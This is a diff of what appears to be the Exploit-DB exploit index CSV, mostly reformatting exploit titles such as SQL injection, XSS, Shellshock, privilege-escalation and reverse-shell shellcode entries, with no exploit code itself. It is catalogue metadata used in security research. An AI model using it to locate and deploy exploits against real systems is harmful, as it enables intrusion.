 29873,platforms/multiple/remote/29873.php,"FreePBX 2.2 - SIP Packet Multiple HTML Injection Vulnerabilities",2007-04-20,XenoMuta,multiple,remote,0
 29874,platforms/php/webapps/29874.txt,"PHP Turbulence 0.0.1 Turbulence.php Remote File Include",2007-04-20,Omni,php,webapps,0
 29875,platforms/multiple/dos/29875.py,"AMSN 0.96 - Malformed Message Denial of Service",2007-04-21,"Levent Kayan",multiple,dos,0
@@ -27980,7 +27980,7 @@ id,file,description,date,author,platform,type,port
 31095,platforms/novell/remote/31095.txt,"Novell GroupWise 5.57e/6.5.7/7.0 WebAccess Multiple Cross-Site Scripting Vulnerabilities",2008-01-31,"Frederic Loudet",novell,remote,0
 31096,platforms/php/webapps/31096.txt,"WordPress Plugin ShiftThis Newsletter - SQL Injection",2008-02-03,S@BUN,php,webapps,0
 31097,platforms/php/webapps/31097.txt,"CruxCMS 3.0 - 'search.php' Cross-Site Scripting",2008-02-04,Psiczn,php,webapps,0
-31098,platforms/php/webapps/31098.txt,"Simple OS CMS 0.1c_beta 'login.php' SQL Injection",2008-02-04,Psiczn,php,webapps,0
+31098,platforms/php/webapps/31098.txt,"Simple OS CMS 0.1c_beta - 'login.php' SQL Injection",2008-02-04,Psiczn,php,webapps,0
 31099,platforms/php/webapps/31099.txt,"Codice CMS 'login.php' SQL Injection",2008-02-04,Psiczn,php,webapps,0
 31100,platforms/multiple/dos/31100.txt,"Anon Proxy Server 0.100/0.102 - Remote Authentication Buffer Overflow",2008-02-04,L4teral,multiple,dos,0
 31101,platforms/php/webapps/31101.txt,"HispaH Youtube Clone 'load_message.php' Cross-Site Scripting",2008-02-04,Smasher,php,webapps,0
@@ -28128,8 +28128,8 @@ id,file,description,date,author,platform,type,port
 31230,platforms/php/webapps/31230.txt,"WordPress wp-people Plugin 2.0 - 'wp-people-popup.php' SQL Injection",2008-02-18,S@BUN,php,webapps,0
 31231,platforms/windows/remote/31231.txt,"SIMM-Comm SCI Photo Chat 3.4.9 - Directory Traversal",2008-02-19,"Luigi Auriemma",windows,remote,0
 31232,platforms/multiple/dos/31232.txt,"Foxit WAC Remote Access Server 2.0 Build 3503 - Heap Buffer Overflow",2008-02-16,"Luigi Auriemma",multiple,dos,0
-31233,platforms/multiple/webapps/31233.txt,"WebcamXP 3.72.440/4.05.280 beta /pocketpc camnum Variable Arbitrary Memory Disclosure",2008-02-18,"Luigi Auriemma",multiple,webapps,0
-31234,platforms/multiple/webapps/31234.txt,"WebcamXP 3.72.440/4.05.280 beta /show_gallery_pic id Variable Arbitrary Memory Disclosure",2008-02-18,"Luigi Auriemma",multiple,webapps,0
+31233,platforms/multiple/webapps/31233.txt,"WebcamXP 3.72.440/4.05.280 beta - /pocketpc camnum Variable Arbitrary Memory Disclosure",2008-02-18,"Luigi Auriemma",multiple,webapps,0
+31234,platforms/multiple/webapps/31234.txt,"WebcamXP 3.72.440/4.05.280 beta - /show_gallery_pic id Variable Arbitrary Memory Disclosure",2008-02-18,"Luigi Auriemma",multiple,webapps,0
 31235,platforms/php/webapps/31235.txt,"Jinzora 2.7.5 index.php Multiple Parameter XSS",2008-02-19,"Alexandr Polyakov",php,webapps,0
 31236,platforms/php/webapps/31236.txt,"Jinzora 2.7.5 ajax_request.php Multiple Parameter XSS",2008-02-19,"Alexandr Polyakov",php,webapps,0
 31237,platforms/php/webapps/31237.txt,"Jinzora 2.7.5 slim.php Multiple Parameter XSS",2008-02-19,"Alexandr Polyakov",php,webapps,0
@@ -28491,7 +28491,7 @@ id,file,description,date,author,platform,type,port
 31627,platforms/unix/dos/31627.c,"LICQ <= 1.3.5 - File Descriptor Remote Denial of Service",2008-04-08,"Milen Rangelov",unix,dos,0
 31628,platforms/php/webapps/31628.txt,"Swiki 1.5 - HTML Injection and Cross-Site Scripting Vulnerabilities",2008-04-08,"Brad Antoniewicz",php,webapps,0
 31629,platforms/windows/dos/31629.txt,"HP OpenView Network Node Manager 7.x - 'ovspmd' Buffer Overflow",2008-04-08,"Luigi Auriemma",windows,dos,0
-31630,platforms/linux/remote/31630.txt,"Adobe Flash Player 8/ 9.0.x - SWF File 'DeclareFunction2' ActionScript Tag Remote Code Execution",2008-04-08,"Javier Vicente Vallejo",linux,remote,0
+31630,platforms/linux/remote/31630.txt,"Adobe Flash Player 8/9.0.x - SWF File 'DeclareFunction2' ActionScript Tag Remote Code Execution",2008-04-08,"Javier Vicente Vallejo",linux,remote,0
 31631,platforms/php/webapps/31631.txt,"Pragmatic Utopia PU Arcade <= 2.2 - 'gid' Parameter SQL Injection",2008-04-09,MantiS,php,webapps,0
 31632,platforms/windows/remote/31632.txt,"Microsoft SharePoint Server 2.0 Picture Source HTML Injection",2008-04-09,OneIdBeagl3,windows,remote,0
 31633,platforms/php/webapps/31633.html,"phpBB Fishing Cat Portal Addon - 'functions_portal.php' Remote File Include",2008-04-09,bd0rk,php,webapps,0
@@ -28819,7 +28819,7 @@ id,file,description,date,author,platform,type,port
 31967,platforms/asp/webapps/31967.txt,"Commtouch Anti-Spam Enterprise Gateway 'PARAMS' Parameter Cross-Site Scripting",2008-06-26,"Erez Metula",asp,webapps,0
 31968,platforms/linux/dos/31968.txt,"GNOME Rhythmbox 0.11.5 Malformed Playlist File Denial Of Service",2008-06-26,"Juan Pablo Lopez Yacubian",linux,dos,0
 32135,platforms/php/webapps/32135.txt,"common solutions csphonebook 1.02 - 'index.php' Cross-Site Scripting",2008-07-31,"Ghost Hacker",php,webapps,0
-32046,platforms/jsp/webapps/32046.txt,"IBM Maximo 4.1/ 5.2 - 'debug.jsp' HTML Injection And Information Disclosure Vulnerabilities",2008-07-11,"Deniz Cevik",jsp,webapps,0
+32046,platforms/jsp/webapps/32046.txt,"IBM Maximo 4.1/5.2 - 'debug.jsp' HTML Injection And Information Disclosure Vulnerabilities",2008-07-11,"Deniz Cevik",jsp,webapps,0
 32047,platforms/php/webapps/32047.txt,"Hudson 1.223 - 'q' Parameter Cross-Site Scripting",2008-07-11,syniack,php,webapps,0
 32048,platforms/osx/remote/32048.html,"Apple iPhone and iPod Touch < 2.0 - Multiple Remote Vulnerabilities",2008-07-11,"Hiromitsu Takagi",osx,remote,0
 31970,platforms/php/webapps/31970.txt,"PHP-CMDB 0.7.3 - Multiple Vulnerabilities",2014-02-28,HauntIT,php,webapps,80
@@ -30314,7 +30314,7 @@ id,file,description,date,author,platform,type,port
 33633,platforms/windows/webapps/33633.txt,"IPSwitch IMail Server WEB client 12.4 persistent XSS",2014-06-03,Peru,windows,webapps,0
 33644,platforms/php/webapps/33644.txt,"Basic-CMS 'nav_id' Parameter Cross-Site Scripting",2010-02-12,Red-D3v1L,php,webapps,0
 33641,platforms/php/webapps/33641.txt,"Joomla! F!BB Component 1.5.96 RC SQL Injection and HTML Injection Vulnerabilities",2009-09-17,"Jeff Channell",php,webapps,0
-33642,platforms/windows/remote/33642.html,"Symantec Multiple Products Client Proxy ActiveX (CLIproxy.dll) Remote Overflow",2010-02-17,"Alexander Polyakov",windows,remote,0
+33642,platforms/windows/remote/33642.html,"Symantec Multiple Products - Client Proxy ActiveX (CLIproxy.dll) Remote Overflow",2010-02-17,"Alexander Polyakov",windows,remote,0
 33643,platforms/php/webapps/33643.txt,"CMS Made Simple 1.6.6 - Local File Include and Cross-Site Scripting Vulnerabilities",2010-02-12,"Beenu Arora",php,webapps,0
 33647,platforms/asp/webapps/33647.txt,"Portrait Software Portrait Campaign Manager 4.6.1.22 - Multiple Cross-Site Scripting Vulnerabilities",2010-02-16,"Roel Schouten",asp,webapps,0
 33648,platforms/hardware/remote/33648.txt,"Huawei HG510 - Multiple Cross-Site Request Forgery Vulnerabilities",2010-02-16,"Ivan Markovic",hardware,remote,0
@@ -31203,7 +31203,7 @@ id,file,description,date,author,platform,type,port
 34643,platforms/php/webapps/34643.txt,"Silurus Classifieds category.php ID Parameter XSS",2009-08-06,Moudi,php,webapps,0
 34644,platforms/php/webapps/34644.txt,"Silurus Classifieds wcategory.php ID Parameter XSS",2009-08-06,Moudi,php,webapps,0
 34645,platforms/php/webapps/34645.txt,"Silurus Classifieds search.php keywords Parameter XSS",2009-08-06,Moudi,php,webapps,0
-34646,platforms/php/webapps/34646.txt,"Blog Ink (Blink) Multiple SQL Injection Vulnerabilities",2009-08-03,Drosophila,php,webapps,0
+34646,platforms/php/webapps/34646.txt,"Blog Ink (Blink) - Multiple SQL Injection Vulnerabilities",2009-08-03,Drosophila,php,webapps,0
 34647,platforms/windows/remote/34647.txt,"Ammyy Admin 3.5 - RCE",2014-09-13,scriptjunkie,windows,remote,0
 34648,platforms/windows/local/34648.txt,"Comodo Internet Security - HIPS/Sandbox Escape PoC",2014-09-13,"Joxean Koret",windows,local,0
 34649,platforms/php/webapps/34649.txt,"Netautor Professional 5.5 - 'login2.php' Cross-Site Scripting",2010-09-17,"Gjoko Krstic",php,webapps,0
@@ -31430,8 +31430,8 @@ id,file,description,date,author,platform,type,port
 34890,platforms/php/webapps/34890.txt,"Wiccle Web Builder 2.0 - Multiple Cross-Site Scripting Vulnerabilities",2010-10-21,"Veerendra G.G",php,webapps,0
 34891,platforms/php/webapps/34891.txt,"Micro CMS 1.0 - 'name' Parameter HTML Injection",2010-10-21,"SecPod Research",php,webapps,0
 34892,platforms/php/webapps/34892.txt,"pecio CMS 2.0.5 - 'target' Parameter Cross-Site Scripting",2010-10-21,"Antu Sanadi",php,webapps,0
-34893,platforms/php/webapps/34893.txt,"PHP Scripts Now Multiple Products bios.php rank Parameter XSS",2009-07-20,"599eme Man",php,webapps,0
-34894,platforms/php/webapps/34894.txt,"PHP Scripts Now Multiple Products bios.php rank Parameter SQL Injection",2009-07-20,"599eme Man",php,webapps,0
+34893,platforms/php/webapps/34893.txt,"PHP Scripts Now Multiple Products - bios.php rank Parameter XSS",2009-07-20,"599eme Man",php,webapps,0
+34894,platforms/php/webapps/34894.txt,"PHP Scripts Now Multiple Products - bios.php rank Parameter SQL Injection",2009-07-20,"599eme Man",php,webapps,0
 34895,platforms/cgi/webapps/34895.rb,"Bash CGI - RCE Shellshock Exploit (Metasploit)",2014-10-06,"Fady Mohammed Osman",cgi,webapps,0
 34896,platforms/linux/remote/34896.py,"Postfix SMTP 4.2.x < 4.2.48 - Remote Exploit (Shellshock)",2014-10-06,"Phil Blank",linux,remote,0
 34922,platforms/php/webapps/34922.txt,"Creative Contact Form 0.9.7 - Arbitrary File Upload",2014-10-08,"Gianni Angelozzi",php,webapps,0
@@ -31479,7 +31479,7 @@ id,file,description,date,author,platform,type,port
 34943,platforms/windows/remote/34943.txt,"Project Jug 1.0.0 - Directory Traversal",2010-11-01,"John Leitch",windows,remote,0
 34944,platforms/php/webapps/34944.txt,"SmartOptimizer Null Character Remote Information Disclosure",2010-11-01,"Francois Harvey",php,webapps,0
 34945,platforms/multiple/remote/34945.txt,"Home File Share Server 0.7.2 32 - Directory Traversal",2010-11-01,"John Leitch",multiple,remote,0
-34946,platforms/php/webapps/34946.txt,"cformsII 11.5/ 13.1 Plugin for WordPress - 'lib_ajax.php' Multiple Cross-Site Scripting Vulnerabilities",2010-11-01,"Wagner Elias",php,webapps,0
+34946,platforms/php/webapps/34946.txt,"cformsII 11.5/13.1 Plugin for WordPress - 'lib_ajax.php' Multiple Cross-Site Scripting Vulnerabilities",2010-11-01,"Wagner Elias",php,webapps,0
 34947,platforms/php/webapps/34947.txt,"CMS WebManager-Pro 7.4.3 - Cross-Site Scripting and SQL Injection Vulnerabilities",2010-10-30,MustLive,php,webapps,0
 34948,platforms/asp/webapps/34948.txt,"Douran Portal 3.9.7.55 - Arbitrary File Upload and Cross-Site Scripting Vulnerabilities",2010-11-01,ITSecTeam,asp,webapps,0
 34949,platforms/multiple/remote/34949.py,"BroadWorks Call Detail Record Security Bypass",2010-11-02,"Nick Freeman",multiple,remote,0
@@ -31532,7 +31532,7 @@ id,file,description,date,author,platform,type,port
 35004,platforms/php/webapps/35004.txt,"CompactCMS 1.4.1 - Multiple Cross-Site Scripting Vulnerabilities (1)",2010-11-18,"High-Tech Bridge SA",php,webapps,0
 35005,platforms/windows/remote/35005.html,"WebKit Insufficient Entropy Random Number Generator Weakness (1)",2010-11-18,"Amit Klein",windows,remote,0
 35006,platforms/windows/remote/35006.html,"WebKit Insufficient Entropy Random Number Generator Weakness (2)",2010-11-18,"Amit Klein",windows,remote,0
-35007,platforms/windows/remote/35007.c,"Native Instruments Multiple Products DLL Loading Arbitrary Code Execution",2010-11-19,"Gjoko Krstic",windows,remote,0
+35007,platforms/windows/remote/35007.c,"Native Instruments Multiple Products - DLL Loading Arbitrary Code Execution",2010-11-19,"Gjoko Krstic",windows,remote,0
 35008,platforms/cgi/webapps/35008.txt,"Hot Links SQL 3.2 - 'report.cgi' SQL Injection",2010-11-22,"Aliaksandr Hartsuyeu",cgi,webapps,0
 35009,platforms/php/webapps/35009.txt,"AuraCMS 1.62 - 'pdf.php' SQL Injection",2010-11-22,"Don Tukulesto",php,webapps,0
 35010,platforms/osx/local/35010.c,"Apple iOS <= 4.0.2 - Networking Packet Filter Rules Local Privilege Escalation",2010-11-22,Apple,osx,local,0
@@ -31669,7 +31669,7 @@ id,file,description,date,author,platform,type,port
 35143,platforms/php/webapps/35143.txt,"HotWeb Scripts HotWeb Rentals 'PageId' Parameter SQL Injection",2010-12-28,"non customers",php,webapps,0
 35144,platforms/multiple/remote/35144.txt,"Appweb Web Server 3.2.2-1 - Cross-Site Scripting",2010-12-23,"Gjoko Krstic",multiple,remote,0
 35145,platforms/php/webapps/35145.txt,"Pligg CMS 1.1.3 - 'range' Parameter SQL Injection",2010-12-27,Dr.NeT,php,webapps,0
-35146,platforms/php/webapps/35146.txt,"PHP 5.x (< 5.6.2) - Bypass disable_functions Exploit (Shellshock)",2014-11-03,"Ryan King (Starfall)",php,webapps,0
+35146,platforms/php/webapps/35146.txt,"PHP < 5.6.2 - Bypass disable_functions Exploit (Shellshock)",2014-11-03,"Ryan King (Starfall)",php,webapps,0
 35148,platforms/linux/remote/35148.txt,"IBM Tivoli Access Manager 6.1.1 for e-business Directory Traversal",2010-12-24,anonymous,linux,remote,0
 35149,platforms/php/webapps/35149.txt,"LiveZilla 3.2.0.2 - 'Track' Module 'server.php' Cross-Site Scripting",2010-12-27,"Ulisses Castro",php,webapps,0
 35150,platforms/php/webapps/35150.php,"Drupal < 7.32 Pre Auth SQL Injection",2014-11-03,"Stefan Horst",php,webapps,443
@@ -31974,9 +31974,9 @@ id,file,description,date,author,platform,type,port
 35482,platforms/php/webapps/35482.txt,"PluggedOut Blog 1.9.9 - 'year' Parameter Cross-Site Scripting",2011-03-21,"kurdish hackers team",php,webapps,0
 35483,platforms/php/dos/35483.txt,"PHP 5.3.x - 'Intl' Extension 'NumberFormatter::setSymbol()' Function Denial of Service",2011-03-10,thoger,php,dos,0
 35484,platforms/php/dos/35484.php,"PHP 5.3.x - 'Zip' Extension 'stream_get_contents()' Function Denial of Service",2011-03-10,paulgao,php,dos,0
-35485,platforms/php/dos/35485.php,"PHP 5.x (< 5.3.6) 'Zip' Extension - 'zip_fread()' Function Denial of Service",2011-03-10,TorokAlpar,php,dos,0
-35486,platforms/php/dos/35486.php,"PHP 5.x (< 5.3.6) OpenSSL Extension - openssl_encrypt Function Plaintext Data Memory Leak DoS",2011-03-08,dovbysh,php,dos,0
-35487,platforms/php/dos/35487.php,"PHP 5.x (< 5.3.6) OpenSSL Extension - openssl_decrypt Function Ciphertext Data Memory Leak DoS",2011-03-08,dovbysh,php,dos,0
+35485,platforms/php/dos/35485.php,"PHP < 5.3.6 'Zip' Extension - 'zip_fread()' Function Denial of Service",2011-03-10,TorokAlpar,php,dos,0
+35486,platforms/php/dos/35486.php,"PHP < 5.3.6 OpenSSL Extension - openssl_encrypt Function Plaintext Data Memory Leak DoS",2011-03-08,dovbysh,php,dos,0
+35487,platforms/php/dos/35487.php,"PHP < 5.3.6 OpenSSL Extension - openssl_decrypt Function Ciphertext Data Memory Leak DoS",2011-03-08,dovbysh,php,dos,0
 35488,platforms/osx/local/35488.c,"Apple Mac OS X 10.6.x HFS Subsystem Information Disclosure",2011-03-21,"Dan Rosenberg",osx,local,0
 35489,platforms/multiple/dos/35489.pl,"Perl 5.x - 'Perl_reg_numbered_buff_fetch()' Function Remote Denial of Service",2011-03-23,"Vladimir Perepelitsa",multiple,dos,0
 35490,platforms/php/webapps/35490.txt,"IceHrm 7.1 - Multiple Vulnerabilities",2014-12-08,LiquidWorm,php,webapps,0
@@ -32306,7 +32306,7 @@ id,file,description,date,author,platform,type,port
 35995,platforms/hardware/remote/35995.sh,"Shuttle Tech ADSL Modem-Router 915 WM - Unauthenticated Remote DNS Change Exploit",2015-02-05,"Todor Donev",hardware,remote,0
 35996,platforms/php/webapps/35996.txt,"Magento Server MAGMI Plugin - Multiple Vulnerabilities",2015-02-05,SECUPENT,php,webapps,0
 35997,platforms/hardware/remote/35997.sh,"Sagem F@st 3304 Routers PPPoE Credentials Information Disclosure",2011-07-27,securititracker,hardware,remote,0
-35845,platforms/java/remote/35845.rb,"ManageEngine Multiple Products Authenticated File Upload",2015-01-20,Metasploit,java,remote,8080
+35845,platforms/java/remote/35845.rb,"ManageEngine Multiple Products - Authenticated File Upload",2015-01-20,Metasploit,java,remote,8080
 35846,platforms/php/webapps/35846.txt,"WordPress Pixarbay Images Plugin 2.3 - Multiple Vulnerabilities",2015-01-20,"Hans-Martin Muench",php,webapps,80
 35847,platforms/osx/local/35847.c,"OS X networkd - 'effective_audit_token' XPC Type Confusion Sandbox Escape",2015-01-20,"Google Security Research",osx,local,0
 35848,platforms/osx/local/35848.c,"OS X 10.9.5 IOKit IntelAccelerator NULL Pointer Dereference",2015-01-20,"Google Security Research",osx,local,0
@@ -32431,7 +32431,7 @@ id,file,description,date,author,platform,type,port
 35965,platforms/php/webapps/35965.txt,"Joomla! 'com_resman' Component Cross Site Scripting",2011-07-15,SOLVER,php,webapps,0
 35966,platforms/php/webapps/35966.txt,"Joomla! 'com_newssearch' Component SQL Injection",2011-07-15,"Robert Cooper",php,webapps,0
 35967,platforms/php/webapps/35967.txt,"AJ Classifieds 'listingid' Parameter - SQL Injection",2011-07-15,Lazmania61,php,webapps,0
-35968,platforms/php/webapps/35968.txt,"BlueSoft Multiple Products Multiple SQL Injection Vulnerabilities",2011-07-18,Lazmania61,php,webapps,0
+35968,platforms/php/webapps/35968.txt,"BlueSoft Multiple Products - Multiple SQL Injection Vulnerabilities",2011-07-18,Lazmania61,php,webapps,0
 35969,platforms/php/webapps/35969.txt,"BlueSoft Social Networking CMS - SQL Injection",2011-07-17,Lazmania61,php,webapps,0
 35970,platforms/hardware/remote/35970.txt,"Iskratel SI2000 Callisto 821+ Cross Site Request Forgery and HTML Injection Vulnerabilities",2011-07-18,MustLive,hardware,remote,0
 35971,platforms/php/webapps/35971.txt,"WordPress bSuite Plugin 4.0.7 - Multiple HTML Injection Vulnerabilities",2011-07-11,IHTeam,php,webapps,0
@@ -32573,10 +32573,10 @@ id,file,description,date,author,platform,type,port
 36136,platforms/php/webapps/36136.txt,"StarDevelop LiveHelp 2.0 - 'index.php' Local File Include",2011-09-15,KedAns-Dz,php,webapps,0
 36137,platforms/php/webapps/36137.txt,"PunBB <= 1.3.5 Multiple Cross-Site Scripting Vulnerabilities",2011-09-16,"Piotr Duszynski",php,webapps,0
 36138,platforms/asp/webapps/36138.txt,"ASP Basit Haber Script 1.0 - 'id' Parameter SQL Injection",2011-09-18,m3rciL3Ss,asp,webapps,0
-36139,platforms/asp/webapps/36139.txt,"Ay Computer Multiple Products Multiple SQL Injection Vulnerabilities",2011-09-17,m3rciL3Ss,asp,webapps,0
+36139,platforms/asp/webapps/36139.txt,"Ay Computer Multiple Products - Multiple SQL Injection Vulnerabilities",2011-09-17,m3rciL3Ss,asp,webapps,0
 36140,platforms/php/webapps/36140.txt,"Toko LiteCMS 1.5.2 HTTP Response Splitting and Cross Site Scripting Vulnerabilities",2011-09-19,"Gjoko Krstic",php,webapps,0
 36141,platforms/asp/webapps/36141.txt,"Aspgwy Access 1.0 - 'matchword' Parameter Cross Site Scripting",2011-09-19,"kurdish hackers team",asp,webapps,0
-36142,platforms/php/webapps/36142.txt,"net4visions Multiple Products 'dir' parameters Multiple Cross Site Scripting Vulnerabilities",2011-09-19,"Gjoko Krstic",php,webapps,0
+36142,platforms/php/webapps/36142.txt,"net4visions Multiple Products - 'dir' parameters Multiple Cross Site Scripting Vulnerabilities",2011-09-19,"Gjoko Krstic",php,webapps,0
 36143,platforms/osx/local/36143.txt,"Apple Mac OS X Lion Directory Services Security Bypass Vulnerabilities",2011-09-19,"Defence in Depth",osx,local,0
 36144,platforms/php/webapps/36144.txt,"Card sharj 1.0 Multiple SQL Injection Vulnerabilities",2011-09-19,Net.Edit0r,php,webapps,0
 36145,platforms/windows/remote/36145.py,"IBM Lotus Domino 8.5.2 - 'NSFComputeEvaluateExt()' Function Remote Stack Buffer Overflow",2011-09-20,rmallof,windows,remote,0
@@ -33675,7 +33675,7 @@ id,file,description,date,author,platform,type,port
 37289,platforms/lin_x86/shellcode/37289.txt,"Linux/x86 - execve /bin/sh shellcode (2) (21 bytes)",2015-06-15,B3mB4m,lin_x86,shellcode,0
 37290,platforms/php/webapps/37290.txt,"Milw0rm Clone Script 1.0 - (Auth Bypass) SQL Injection",2015-06-15,"walid naceri",php,webapps,0
 37291,platforms/windows/dos/37291.py,"Putty 0.64 - Denial of Service",2015-06-15,3unnym00n,windows,dos,0
-37293,platforms/linux/local/37293.txt,"Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - overlayfs Privilege Escalation (Access /etc/shadow)",2015-06-16,rebel,linux,local,0
+37293,platforms/linux/local/37293.txt,"Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'overlayfs' Privilege Escalation (Access /etc/shadow)",2015-06-16,rebel,linux,local,0
 37561,platforms/multiple/dos/37561.pl,"UPNPD M-SEARCH ssdp:discover Reflection Denial of Service",2015-07-10,"Todor Donev",multiple,dos,1900
 37329,platforms/php/webapps/37329.txt,"Nilehoster Topics Viewer 2.3 Multiple SQL Injection and Local File Include Vulnerabilities",2012-05-27,n4ss1m,php,webapps,0
 37330,platforms/php/webapps/37330.txt,"Yamamah Photo Gallery 1.1 Database Information Disclosure",2012-05-28,L3b-r1'z,php,webapps,0
@@ -33768,7 +33768,7 @@ id,file,description,date,author,platform,type,port
 37412,platforms/php/webapps/37412.php,"Joomla! Maian Media Component 'uploadhandler.php' Arbitrary File Upload",2012-06-16,"Sammy FORGIT",php,webapps,0
 37413,platforms/php/webapps/37413.txt,"Joomla JCal Pro Calendar Component SQL Injection",2012-06-15,"Taurus Omar",php,webapps,0
 37414,platforms/php/webapps/37414.txt,"Simple Document Management System 1.1.5 Multiple SQL Injection Vulnerabilities",2012-06-16,JosS,php,webapps,0
-37415,platforms/php/webapps/37415.txt,"Webify Multiple Products Multiple HTML Injection and Local File Include Vulnerabilities",2012-06-16,snup,php,webapps,0
+37415,platforms/php/webapps/37415.txt,"Webify Multiple Products - Multiple HTML Injection and Local File Include Vulnerabilities",2012-06-16,snup,php,webapps,0
 37416,platforms/java/webapps/37416.txt,"Squiz CMS Multiple Cross Site Scripting and XML External Entity Injection Vulnerabilities",2012-06-14,"Nadeem Salim",java,webapps,0
 37417,platforms/php/webapps/37417.php,"WordPress Multiple Themes 'upload.php' Arbitrary File Upload",2012-06-18,"Sammy FORGIT",php,webapps,0
 37418,platforms/php/webapps/37418.php,"WordPress LB Mixed Slideshow Plugin 'upload.php' Arbitrary File Upload",2012-06-18,"Sammy FORGIT",php,webapps,0
@@ -33881,7 +33881,7 @@ id,file,description,date,author,platform,type,port
 37621,platforms/windows/webapps/37621.txt,"Kaseya Virtual System Administrator - Multiple Vulnerabilities (1)",2015-07-15,"Pedro Ribeiro",windows,webapps,0
 37530,platforms/php/webapps/37530.txt,"WordPress WP e-Commerce Shop Styling Plugin 2.5 - Arbitrary File Download",2015-07-08,"Larry W. Cashdollar",php,webapps,80
 37531,platforms/hardware/webapps/37531.txt,"Grandstream GXV3275 < 1.0.3.30 - Multiple Vulnerabilities",2015-07-08,"David Jorm",hardware,webapps,0
-37532,platforms/hardware/webapps/37532.txt,"AirLive Multiple Products OS Command Injection",2015-07-08,"Core Security",hardware,webapps,8080
+37532,platforms/hardware/webapps/37532.txt,"AirLive Multiple Products - OS Command Injection",2015-07-08,"Core Security",hardware,webapps,8080
 37533,platforms/asp/webapps/37533.txt,"Orchard CMS 1.7.3/1.8.2/1.9.0 - Stored XSS",2015-07-08,"Paris Zoumpouloglou",asp,webapps,80
 37536,platforms/multiple/remote/37536.rb,"Adobe Flash Player Nellymoser Audio Decoding Buffer Overflow",2015-07-08,Metasploit,multiple,remote,0
 37537,platforms/php/webapps/37537.txt,"phpProfiles Multiple Security Vulnerabilities",2012-07-24,L0n3ly-H34rT,php,webapps,0
@@ -34025,7 +34025,7 @@ id,file,description,date,author,platform,type,port
 37692,platforms/multiple/dos/37692.pl,"aMSN Remote Denial of Service",2006-01-01,"Braulio Miguel Suarez Urquijo",multiple,dos,0
 37693,platforms/php/webapps/37693.txt,"Sitemax Maestro SQL Injection and Local File Include Vulnerabilities",2012-09-03,AkaStep,php,webapps,0
 37694,platforms/php/webapps/37694.txt,"Wiki Web Help 'configpath' Parameter Remote File Include",2012-08-04,L0n3ly-H34rT,php,webapps,0
-37695,platforms/php/webapps/37695.txt,"Sciretech Multiple Products Multiple SQL Injection Vulnerabilities",2012-09-04,AkaStep,php,webapps,0
+37695,platforms/php/webapps/37695.txt,"Sciretech Multiple Products - Multiple SQL Injection Vulnerabilities",2012-09-04,AkaStep,php,webapps,0
 37696,platforms/asp/webapps/37696.txt,"Cm3 CMS 'search.asp' Multiple Cross-Site Scripting Vulnerabilities",2012-09-05,Crim3R,asp,webapps,0
 37697,platforms/php/webapps/37697.txt,"phpFox 3.0.1 - 'ajax.php' Multiple Cross Site Scripting Vulnerabilities",2012-09-04,Crim3R,php,webapps,0
 37698,platforms/php/webapps/37698.txt,"Kayako Fusion 'download.php' Cross Site Scripting",2012-09-05,"High-Tech Bridge",php,webapps,0
@@ -34949,7 +34949,7 @@ id,file,description,date,author,platform,type,port
 38676,platforms/php/webapps/38676.txt,"WordPress Duplicator Plugin Cross Site Scripting",2013-07-24,"High-Tech Bridge",php,webapps,0
 38677,platforms/php/webapps/38677.txt,"VBulletin <= 4.0.2 - 'update_order' Parameter SQL Injection",2013-07-24,n3tw0rk,php,webapps,0
 38678,platforms/php/webapps/38678.txt,"WordPress WP Fastest Cache Plugin 0.8.4.8 - Blind SQL Injection",2015-11-11,"Kacper Szurek",php,webapps,0
-38679,platforms/php/webapps/38679.txt,"AlienVault Open Source SIEM (OSSIM) Multiple Cross Site Scripting Vulnerabilities",2013-07-25,xistence,php,webapps,0
+38679,platforms/php/webapps/38679.txt,"AlienVault Open Source SIEM (OSSIM) - Multiple Cross Site Scripting Vulnerabilities",2013-07-25,xistence,php,webapps,0
 38680,platforms/linux/remote/38680.html,"xmonad XMonad.Hooks.DynamicLog Module Multiple Remote Command Injection Vulnerabilities",2013-07-26,"Joachim Breitner",linux,remote,0
 38681,platforms/linux/dos/38681.py,"FBZX 2.10 - Local Stack-Based Buffer Overflow",2015-11-11,"Juan Sacco",linux,dos,0
 38682,platforms/php/webapps/38682.txt,"Jahia xCM /engines/manager.jsp site Parameter XSS",2013-07-31,"High-Tech Bridge",php,webapps,0
@@ -35929,7 +35929,7 @@ id,file,description,date,author,platform,type,port
 39716,platforms/hardware/webapps/39716.py,"Gemtek CPE7000 / WLTCS-106 - Multiple Vulnerabilities",2016-04-21,"Federico Ramondino",hardware,webapps,443
 39718,platforms/lin_x86-64/shellcode/39718.c,"Linux/x86-64 - bindshell (Port 5600) shellcode (86 bytes)",2016-04-21,"Ajith Kp",lin_x86-64,shellcode,0
 39719,platforms/windows/local/39719.ps1,"Microsoft Windows 7-10 & Server 2008-2012 (x32/x64) - Local Privilege Escalation (MS16-032) (PowerShell)",2016-04-21,b33f,windows,local,0
-40094,platforms/win_x86/shellcode/40094.c,"Windows x86 - URLDownloadToFileA()+SetFileAttributesA()+WinExec()+ExitProcess() Shellcode (394 bytes)",2016-07-13,"Roziul Hasan Khan Shifat",win_x86,shellcode,0
+40094,platforms/win_x86/shellcode/40094.c,"Windows x86 - URLDownloadToFileA() + SetFileAttributesA() + WinExec() + ExitProcess() Shellcode (394 bytes)",2016-07-13,"Roziul Hasan Khan Shifat",win_x86,shellcode,0
 39720,platforms/jsp/webapps/39720.txt,"Totemomail 4.x / 5.x - Persistent XSS",2016-04-25,Vulnerability-Lab,jsp,webapps,0
 39721,platforms/ios/webapps/39721.txt,"C/C++ Offline Compiler and C For OS - Persistent XSS",2016-04-25,Vulnerability-Lab,ios,webapps,0
 39722,platforms/lin_x86/shellcode/39722.c,"Linux/x86 - Reverse TCP Shellcode (IPv6) (159 bytes)",2016-04-25,"Roziul Hasan Khan Shifat",lin_x86,shellcode,0
@@ -36270,7 +36270,7 @@ id,file,description,date,author,platform,type,port
 40079,platforms/lin_x86-64/shellcode/40079.c,"Linux/x86-64 - Continuously-Probing Reverse Shell via Socket + Port-range + Password shellcode (172 bytes)",2016-07-11,CripSlick,lin_x86-64,shellcode,0
 40106,platforms/windows/webapps/40106.txt,"GSX Analyzer 10.12 and 11 - Main.swf Hardcoded Superadmin Credentials",2016-07-13,ndevnull,windows,webapps,0
 40107,platforms/windows/local/40107.rb,"Windows 7-10 and 2k8-2k12 x86/x64 - Secondary Logon Handle Privilege Escalation (MS16-032)",2016-07-13,Metasploit,windows,local,0
